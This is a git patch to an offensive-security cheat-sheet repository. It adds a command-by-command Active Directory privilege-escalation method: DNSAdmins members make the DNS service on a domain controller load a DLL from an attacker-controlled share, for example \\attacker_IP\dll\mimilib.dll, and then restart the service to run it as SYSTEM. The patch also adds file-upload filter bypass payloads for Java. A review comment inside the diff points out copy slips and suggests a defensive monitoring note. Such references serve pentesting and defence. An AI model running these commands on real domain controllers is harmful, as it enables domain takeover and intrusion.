From 0c7da8ec41145ed0ae1c32bed7846f1bb84edc89 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 7 Jun 2022 20:36:09 +0200
Subject: [PATCH] DNS Admins Group

---
 .../Active Directory Attack.md | 34 +++++++++++++++++++
 Upload Insecure Files/README.md | 6 ++--
 2 files changed, 38 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 79fe436..b909881 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -84,6 +84,7 @@
 - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
 - [Pass-The-Certificate](#pass-the-certificate)
 - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
+ - [Abusing DNS Admins Group](#abusing-dns-admins-group)
 - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
 - [GenericAll](#genericall)
 - [GenericWrite](#genericwrite)
@@ -2583,6 +2584,39 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
 ```
+### Abusing DNS Admins Group
+
+> It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM).
+
+:warning: Require privileges to restart the DNS service.
+
+* Enumerate members of DNSAdmins group
+ ```ps1
+ Get-NetGroupMember -GroupName "DNSAdmins"
+ Get-ADGroupMember -Identity DNSAdmins
+ ```
+* Change dll loaded by the DNS service
+ ```ps1
+ # with RSAT
+ dnscmd /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
+ dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll
+
+ # with DNSServer module
+ $dnsettings = Get-DnsServerSetting -ComputerName -Verbose -All
+ $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
+ Set-DnsServerSetting -InputObject $dnsettings -ComputerName -Verbose
+ ```
+* Check the previous command success
+ ```ps1
+ Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
+ ```
+* Restart DNS
+ ```ps1
+ sc \\dc01 stop dns
+ sc \\dc01 start dns
+ ```
+
+
 ### Abusing Active Directory ACLs/ACEs
 Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index 54b30cb..8a17f57 100644
--- a/Upload Insecure Files/README.md
+++ b/Upload Insecure Files/README.md
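Review bot: In the new "Abusing DNS Admins Group" section the DNSServer-module example assigns `"\attacker_IP\dll\mimilib.dll"` to ServerLevelPluginDll while the dnscmd lines just above use the UNC form `\\attacker_IP\...`, and both `Get-DnsServerSetting -ComputerName -Verbose -All` and `Set-DnsServerSetting -InputObject $dnsettings -ComputerName -Verbose` leave `-ComputerName` without a value; these read as copy slips rather than deliberate placeholders, so either make them consistent with the dnscmd lines or mark the missing values as explicit placeholders such as `<dns_server>`. The section also stops at the check step and gives readers nothing for the defensive side, even though it already names the exact registry value; a closing bullet along the lines of `* Defense: monitor DNSAdmins membership changes and alert on any modification of the ServerLevelPluginDll value under HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters — a value pointing at a UNC path is worth investigating` would make the page usable by blue teams as well. The `:warning:` line about needing privileges to restart the DNS service would be clearer if it said whether DNSAdmins membership alone is expected to grant that, since the enumeration step suggests it is the only prerequisite — I am inferring that reading from the wording.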
@@ -65,7 +65,8 @@
 * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
 * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
 * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
- * Slash: `file.php/`, `file.php.\`
+ * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
+ * Multiple special characters: `file.jsp/././././.`
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
 * `Content-Type : image/gif`
 * `Content-Type : image/png`
@@ -161,4 +162,5 @@ When a ZIP/archive file is automatically decompressed after the upload
 * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
 * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
 * [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
-* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
\ No newline at end of file
+* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
+* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
\ No newline at end of file